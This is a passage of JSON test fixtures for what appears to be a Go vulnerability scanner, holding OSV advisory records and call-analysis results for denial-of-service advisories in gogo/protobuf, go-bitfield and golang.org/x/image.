"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. 
plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.3.0", "summary": "Improper Input Validation in GoGo Protobuf" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. 
If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.0", "summary": "" } ] }, { "groups": [ { "experimentalAnalysis": {}, "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ] } ], "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "version": "1.0.0" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ], "versions": [ "1.0.0" ] } ], "aliases": [ "CVE-2023-23626" ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" }, "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling 
`NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "schema_version": "1.3.0", "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "schema_version": "1.3.0", "summary": "" } ] }, { "groups": [ { "experimentalAnalysis": {}, "ids": [ 
"GHSA-qgc7-mgm3-q253", "GO-2023-1572" ] } ], "package": { "ecosystem": "Go", "name": "golang.org/x/image", "version": "0.4.0" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" }, "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "schema_version": "1.3.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ], "schema_version": "1.3.0", "summary": "" } ] } ] ================================================ FILE: internal/sourceanalysis/testdata/json/output.json ================================================ [ { "groups": [ { "experimentalAnalysis": { "GO-2021-0053": { "called": false } }, "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } ], "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "version": "1.3.1" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. 
plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.3.0", "summary": "Improper Input Validation in GoGo Protobuf" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], 
"details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.0", "summary": "" } ] }, { "groups": [ { "experimentalAnalysis": { "GO-2023-1558": { "called": true } }, "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ] } ], "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "version": "1.0.0" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ], "versions": [ "1.0.0" ] } ], "aliases": [ "CVE-2023-23626" ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" }, "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- 
https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "schema_version": "1.3.0", "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "references": [ { "type": "ADVISORY", "url": 
"https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "schema_version": "1.3.0", "summary": "" } ] }, { "groups": [ { "experimentalAnalysis": { "GO-2023-1572": { "called": false } }, "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ] } ], "package": { "ecosystem": "Go", "name": "golang.org/x/image", "version": "0.4.0" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" }, "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "schema_version": "1.3.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/image/tiff", "symbols": [ "Decode", "DecodeConfig", "decoder.ifdUint", "newDecoder" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ], "schema_version": "1.3.0", "summary": "" } ] } ] ================================================ FILE: internal/sourceanalysis/testdata/json/vulnbyid-no-call-data.json ================================================ { "GHSA-2h6c-j3gf-xp9r": { "schema_version": "1.3.0", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "aliases": [ "CVE-2023-23626" ], "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments", "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0" ], "database_specific": 
{ "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" } }, "GHSA-c3h9-896r-86jm": { "schema_version": "1.3.0", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. 
plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, "GHSA-qgc7-mgm3-q253": { "schema_version": "1.3.0", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", 
"aliases": [ "CVE-2022-41727" ], "summary": "Uncontrolled Resource Consumption", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" } }, "GO-2021-0053": { "schema_version": "1.3.0", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. 
If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ] }, "GO-2023-1558": { "schema_version": "1.3.0", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "summary": "", "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ] }, "GO-2023-1572": { "schema_version": "1.3.0", "id": "GO-2023-1572", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:25:24Z", "aliases": [ "CVE-2022-41727", "GHSA-qgc7-mgm3-q253" ], "summary": "", "details": "An attacker can craft a malformed TIFF 
image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ] } } ================================================ FILE: internal/sourceanalysis/testdata/json/vulnbyid.json ================================================ { "GHSA-2h6c-j3gf-xp9r": { "schema_version": "1.3.0", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "aliases": [ "CVE-2023-23626" ], "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments", "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", 
